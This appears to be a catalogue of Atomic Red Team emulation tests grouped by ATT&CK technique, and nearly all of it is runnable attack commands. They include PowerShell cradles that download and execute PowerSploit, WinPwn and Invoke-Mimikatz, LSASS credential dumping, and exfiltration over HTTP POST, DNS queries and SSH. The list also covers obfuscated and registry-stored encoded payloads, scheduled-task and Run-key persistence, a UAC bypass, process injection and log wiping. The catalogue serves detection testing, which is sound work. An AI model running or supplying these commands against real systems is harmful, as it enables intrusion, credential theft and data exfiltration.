cmd /c '#{netscan_path}' /hide /auto:"$env:temp\T1018NetscanOutput.txt" /range:'#{range_to_scan}'

T1027 Obfuscated Files or Information · 11 tests

shmacos, linuxDecode base64 Data into Script

if [ "$(uname)" = 'FreeBSD' ]; then cmd="b64decode -r"; else cmd="base64 -d"; fi;
cat /tmp/encoded.dat | $cmd > /tmp/art.sh
chmod +x /tmp/art.sh
/tmp/art.sh

powershellwindowsExecute base64-encoded PowerShell

$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
powershell.exe -EncodedCommand $EncodedCommand

powershellwindowsExecute base64-encoded PowerShell from Windows Registry

$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand

Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))"

command_promptwindowsExecution from Compressed File

"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe"

powershellwindowsDLP Evasion via Sensitive Data in VBA Macro over email

Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments "#{input_file}" -SmtpServer #{smtp_server}

powershellwindowsDLP Evasion via Sensitive Data in VBA Macro over HTTP

Invoke-WebRequest -Uri #{ip_address} -Method POST -Body "#{input_file}"

powershellwindowsObfuscated Command in PowerShell

$cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING')  ;   $pz2Sb0  =[TYpE]("{1}{0}{2}"-f'nv','cO','ert')  ;  &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') (  (&("{1}{2}{0}"-f'blE','gET-','vaRIA')  ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] (  $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )

manualwindowsObfuscated Command Line using special Unicode characters

powershellelevatedwindowsSnake Malware Encrypted crmlog file

$file = New-Item $env:windir\registration\04e53197-72be-4dd8-88b1-533fe6eed577.04e53197-72be-4dd8-88b1-533fe6eed577.crmlog; $file.Attributes = 'Hidden', 'System', 'Archive'; Write-Host "File created: $($file.FullName)"

command_promptwindowsExecution from Compressed JScript File

"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js"

powershellwindowsObfuscated PowerShell Command via Character Array

$ps = [char[]](112,111,119,101,114,115,104,101,108,108)
$cmd = [char[]](83,116,97,114,116,45,80,114,111,99,101,115,115,32,99,97,108,99,46,101,120,101)
& (-join $ps) "-Command" (-join $cmd)

T1033 System Owner/User Discovery · 7 tests

command_promptwindowsSystem Owner/User Discovery

cmd.exe /C whoami
wmic useraccount get /ALL
quser /SERVER:"#{computer_name}"
quser
qwinsta.exe /server:#{computer_name}
qwinsta.exe
for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt

shlinux, macosSystem Owner/User Discovery

users
w
who

powershellwindowsFind computers where user has session - Stealth mode (PowerView)

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose

powershellwindowsUser Discovery With Env Vars PowerShell Script

[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt 
$env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append

powershellwindowsGetCurrent User with PowerShell Script

[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt

powershellwindowsSystem Discovery - SocGholish whoami

$TokenSet = @{
  U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
  N = [Char[]]'0123456789'
}
$Upper = Get-Random -Count 5 -InputObject $TokenSet.U
$Number = Get-Random -Count 5 -InputObject $TokenSet.N
$StringSet = $Upper + $Number
$rad = (Get-Random -Count 5 -InputObject $StringSet) -join ''
$file = "rad" + $rad + ".tmp"

whoami.exe /all >> #{output_path}\$file

command_promptwindowsSystem Owner/User Discovery Using Command Prompt

set file=#{output_file_path}\user_info_%random%.tmp
echo Username: %USERNAME% > %file%
echo User Domain: %USERDOMAIN% >> %file%
net users >> %file%
query user >> %file%

T1036 Masquerading · 2 tests

powershellwindowsSystem File Copied to Unusual Location

copy-item "$env:windir\System32\cmd.exe" -destination "$env:allusersprofile\cmd.exe"
start-process "$env:allusersprofile\cmd.exe"
sleep -s 5 
stop-process -name "cmd" | out-null

powershellwindowsMalware Masquerading and Execution from Zip File

Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" -DestinationPath "$env:userprofile\Downloads\T1036" -Force
cd "$env:userprofile\Downloads\T1036"
cmd /c "$env:userprofile\Downloads\T1036\README.cmd" >$null 2>$null

T1036.005 Match Legitimate Resource Name or Location · 3 tests

shmacos, linuxExecute a process from a directory masquerading as the current parent directory

mkdir $HOME/...
cp $(which sh) $HOME/...
$HOME/.../sh -c "echo #{test_message}"

powershellwindowsMasquerade as a built-in system executable

Add-Type -TypeDefinition @'
public class Test {
    public static void Main(string[] args) {
        System.Console.WriteLine("tweet, tweet");
    }
}
'@ -OutputAssembly "#{executable_filepath}"

Start-Process -FilePath "#{executable_filepath}"

powershellelevatedwindowsMasquerading cmd.exe as VEDetector.exe

# Copy and rename cmd.exe to VEDetector.exe
Copy-Item -Path "#{source_file}" -Destination "#{ved_path}\VEDetector.exe" -Force

# Create registry run key for persistence
New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "VEDetector" -Value "#{ved_path}\VEDetector.exe" -PropertyType String -Force

# Start the renamed process
Start-Process -FilePath "#{ved_path}\VEDetector.exe"

Start-Sleep -Seconds 5

T1039 Data from Network Shared Drive · 2 tests

command_promptelevatedwindowsCopy a sensitive File over Administrative share with copy

copy \\#{remote}\C$\#{share_file} %TEMP%\#{local_file}

powershellelevatedwindowsCopy a sensitive File over Administrative share with Powershell

copy-item -Path "\\#{remote}\C$\#{share_file}" -Destination "$Env:TEMP\#{local_file}"

T1041 Exfiltration Over C2 Channel · 2 tests

powershellwindowsC2 Data Exfiltration

if(-not (Test-Path #{filepath})){ 
  1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
}
[System.Net.ServicePointManager]::Expect100Continue = $false
$filecontent = Get-Content -Path #{filepath}
Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive

powershellwindowsText Based Data Exfiltration using DNS subdomains

$dnsServer = "#{dns_server}"
$exfiltratedData = "#{exfiltrated_data}"
$chunkSize = #{chunk_size}

$encodedData = [System.Text.Encoding]::UTF8.GetBytes($exfiltratedData)
$encodedData = [Convert]::ToBase64String($encodedData)
$chunks = $encodedData -split "(.{$chunkSize})"

foreach ($chunk in $chunks) {
    $dnsQuery = $chunk + "." + $dnsServer
    Resolve-DnsName -Name $dnsQuery
    Start-Sleep -Seconds 5
}

T1046 Network Service Discovery · 12 tests

bashlinux, macosPort Scan

for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done

shelevatedlinux, macosPort Scan Nmap

sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}

powershellelevatedwindowsPort Scan NMap for Windows

nmap #{host_to_scan}

powershellwindowsPort Scan using python

python "#{filename}" -i #{host_ip}

powershellwindowsWinPwn - spoolvulnscan

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput

powershellwindowsWinPwn - MS17-10

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput

powershellwindowsWinPwn - bluekeep

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput

powershellwindowsWinPwn - fruit

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput

shcontainersNetwork Service Discovery for Containers

docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh

powershellwindowsPort-Scanning /24 Subnet with PowerShell

$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
    $ip_list = $ipAddr -split ","
    $ip_list = $ip_list.ForEach({ $_.Trim() })
    Write-Host "[i] IP Address List: $ip_list"

    $ports = #{port_list}

    foreach ($ip in $ip_list) {
        foreach ($port in $ports) {
            Write-Host "[i] Establishing connection to: $ip : $port"
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} elseif ($ipAddr -notlike "*,*") {
    if ($ipAddr -eq "") {
        # Assumes the "primary" interface is shown at the top
        $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
        Write-Host "[i] Using Interface $interface"
        $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
    }
    Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
    $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
    # Always assumes /24 subnet
    Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"

    $ports = #{port_list}
    $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }

    foreach ($ip in $subnetIPs) {
        foreach ($port in $ports) {
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} else {
    Write-Host "[Error] Invalid Inputs"
    exit 1
}

powershellelevatedwindowsRemote Desktop Services Discovery via PowerShell

Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"

shelevatedlinux, macosPort Scan using nmap (Port range)

nmap -Pn -sV -p #{port_range} #{host}

T1048 Exfiltration Over Alternative Protocol · 4 tests

shmacos, linuxExfiltration Over Alternative Protocol - SSH

ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz

shmacos, linuxExfiltration Over Alternative Protocol - SSH

tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'

powershellwindowsDNSExfiltration (doh)

Import-Module "#{ps_module}"
Invoke-DNSExfiltrator -i "#{ps_module}" -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}

bashmacos, linuxExfiltrate Data using DNS Queries via dig

dig @#{attacker_dns_server} -p #{dns_port} $(echo "#{secret_info}" | base64).google.com

T1053.005 Scheduled Task · 12 tests

command_promptelevatedwindowsScheduled Task Startup Script

schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"

command_promptwindowsScheduled task Local

SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}

command_promptelevatedwindowsScheduled task Remote

SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}

powershellwindowsPowershell Cmdlet Scheduled Task

$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object

powershellwindowsTask Scheduler via VBA

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"

powershellelevatedwindowsWMI Invoke-CimMethod Scheduled Task

$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }

command_promptwindowsScheduled Task Executing Base64 Encoded Commands From Registry

reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}

powershellelevatedwindowsImport XML Schedule Task with Hidden Attribute

$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }

powershellwindowsPowerShell Modify A Scheduled Task

$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction

command_promptelevatedwindowsScheduled Task ("Ghost Task") via Registry Key Manipulation

"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon

command_promptelevatedwindowsScheduled Task Persistence via CompMgmt.msc

reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc

command_promptelevatedwindowsScheduled Task Persistence via Eventviewer.msc

reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"

T1055 Process Injection · 13 tests

powershellwindowsShellcode execution via VBA

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "#{txt_path}" -officeProduct "Word" -sub "Execute"

command_promptwindowsRemote Process Injection in LSASS via mimikatz

"#{psexec_path}" /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit"

powershellwindowsSection View Injection

$notepad = Start-Process notepad -passthru
Start-Process "$PathToAtomicsFolder\T1055\bin\x64\InjectView.exe"

powershellwindowsDirty Vanity process Injection

Start-Process "$PathToAtomicsFolder\T1055\bin\x64\redVanity.exe" #{pid}

powershellelevatedwindowsRead-Write-Execute process Injection

$address = (& "$PathToAtomicsFolder\T1055\bin\x64\searchVuln.exe" "$PathToAtomicsFolder\T1055\bin\x64\vuln_dll\" | Out-String | Select-String -Pattern "VirtualAddress: (\w+)").Matches.Groups[1].Value
& "PathToAtomicsFolder\T1055\bin\x64\RWXinjectionLocal.exe" "#{vuln_dll}" $address

powershellwindowsProcess Injection with Go using UuidFromStringA WinAPI

$PathToAtomicsFolder\T1055\bin\x64\UuidFromStringA.exe -debug

powershellwindowsProcess Injection with Go using EtwpCreateEtwThread WinAPI

$PathToAtomicsFolder\T1055\bin\x64\EtwpCreateEtwThread.exe -debug

powershellwindowsRemote Process Injection with Go using RtlCreateUserThread WinAPI

$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\RtlCreateUserThread.exe -pid $process.Id -debug

powershellwindowsRemote Process Injection with Go using CreateRemoteThread WinAPI

$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThread.exe -pid $process.Id -debug

powershellwindowsRemote Process Injection with Go using CreateRemoteThread WinAPI (Natively)

$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThreadNative.exe -pid $process.Id -debug

powershellwindowsProcess Injection with Go using CreateThread WinAPI

$PathToAtomicsFolder\T1055\bin\x64\CreateThread.exe -debug

powershellwindowsProcess Injection with Go using CreateThread WinAPI (Natively)

$PathToAtomicsFolder\T1055\bin\x64\CreateThreadNative.exe -debug

powershellelevatedwindowsUUID custom process Injection

Start-Process "#{exe_binary}"
Start-Sleep -Seconds 7
Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force

T1057 Process Discovery · 9 tests

shlinux, macosProcess Discovery - ps

ps >> #{output_file}
ps aux >> #{output_file}

command_promptwindowsProcess Discovery - tasklist

tasklist

powershellwindowsProcess Discovery - Get-Process

Get-Process

powershellwindowsProcess Discovery - get-wmiObject

get-wmiObject -class Win32_Process

command_promptwindowsProcess Discovery - wmic process

wmic process get /format:list

command_promptwindowsDiscover Specific Process - tasklist

tasklist | findstr #{process_to_enumerate}

powershellelevatedwindowsProcess Discovery - Process Hacker

Start-Process -FilePath "$Env:ProgramFiles\Process Hacker 2\#{processhacker_exe}"

powershellelevatedwindowsProcess Discovery - PC Hunter

Start-Process -FilePath "C:\Temp\ExternalPayloads\PCHunter_free\#{pchunter64_exe}"

command_promptwindowsLaunch Taskmgr from cmd to View running processes

taskmgr.exe /7

T1059 Command and Scripting Interpreter · 1 test

powershellwindowsAutoIt Script Execution

Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"

T1059.001 PowerShell · 22 tests

command_promptelevatedwindowsMimikatz

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"

powershellwindowsRun BloodHound from local disk

import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5

powershellwindowsRun Bloodhound from Memory using Download Cradle

write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5

powershellelevatedwindowsMimikatz - Cradlecraft PsSendKeys

$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr

command_promptwindowsInvoke-AppPathBypass

Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"

command_promptwindowsPowershell MsXml COM object - with prompt

powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"

command_promptwindowsPowershell XML requests

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"

command_promptwindowsPowershell invoke mshta.exe download

C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"

manualwindowsPowershell Invoke-DownloadCradle

powershellwindowsPowerShell Fileless Script Execution

# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))

powershellwindowsNTFS Alternate Data Stream Access

Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand

powershellelevatedwindowsPowerShell Session Creation and Use

New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use

powershellwindowsATHPowerShellCommandLineParameter -Command parameter variations

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop

powershellwindowsATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop

powershellwindowsATHPowerShellCommandLineParameter -EncodedCommand parameter variations

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop

powershellwindowsATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments

Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop

command_promptwindowsPowerShell Command Execution

powershell.exe -e  #{obfuscated_code}

powershellelevatedwindowsPowerShell Invoke Known Malicious Cmdlets

$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
    "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
    $cmdlets}

powershellwindowsPowerUp Invoke-AllChecks

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks

powershellwindowsAbuse Nslookup with DNS Records

# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup  { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]

powershellwindowsSOAPHound - Dump BloodHound Data

#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}

powershellwindowsSOAPHound - Build Cache

#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}

T1059.003 Windows Command Shell · 6 tests

powershellwindowsCreate and Execute Batch Script

Start-Process "#{script_path}"

command_promptwindowsWrites text to a file and displays it.

echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}"

command_promptwindowsSuspicious Execution via Windows Command Shell

%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}

powershellwindowsSimulate BlackByte Ransomware Print Bombing

cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p #{file_to_print}" | out-null

command_promptwindowsCommand Prompt read contents from CMD file and execute

cmd /r cmd<"#{input_file}"

command_promptelevatedwindowsCommand prompt writing script to file then executes it

 c:\windows\system32\cmd.exe /c cd /d #{script_path} & echo Set objShell = CreateObject("WScript.Shell"):Set objExec = objShell.Exec("whoami"):Set objExec = Nothing:Set objShell = Nothing > #{script_name}.vbs & #{script_name}.vbs

T1059.005 Visual Basic · 3 tests

powershellwindowsVisual Basic script execution to gather local computer information

cscript "#{vbscript}" > $env:TEMP\T1059.005.out.txt

powershellwindowsEncoded VBS code execution

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"

powershellwindowsExtract Memory via VBA

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"

T1070 Indicator Removal · 2 tests

command_promptelevatedwindowsIndicator Removal using FSUtil

fsutil usn deletejournal /D C:

powershellwindowsIndicator Manipulation using FSUtil

if (-not (Test-Path "#{file_to_manipulate}")) { New-Item "#{file_to_manipulate}" -Force } 
echo "1234567890" > "#{file_to_manipulate}"
fsutil  file setZeroData offset=0 length=#{file_data_length} "#{file_to_manipulate}"

T1070.004 File Deletion · 11 tests

shlinux, macosDelete a single file - FreeBSD/Linux/macOS

rm -f #{file_to_delete}

shlinux, macosDelete an entire folder - FreeBSD/Linux/macOS

rm -rf #{folder_to_delete}

shlinuxOverwrite and delete a file with shred

shred -u #{file_to_shred}

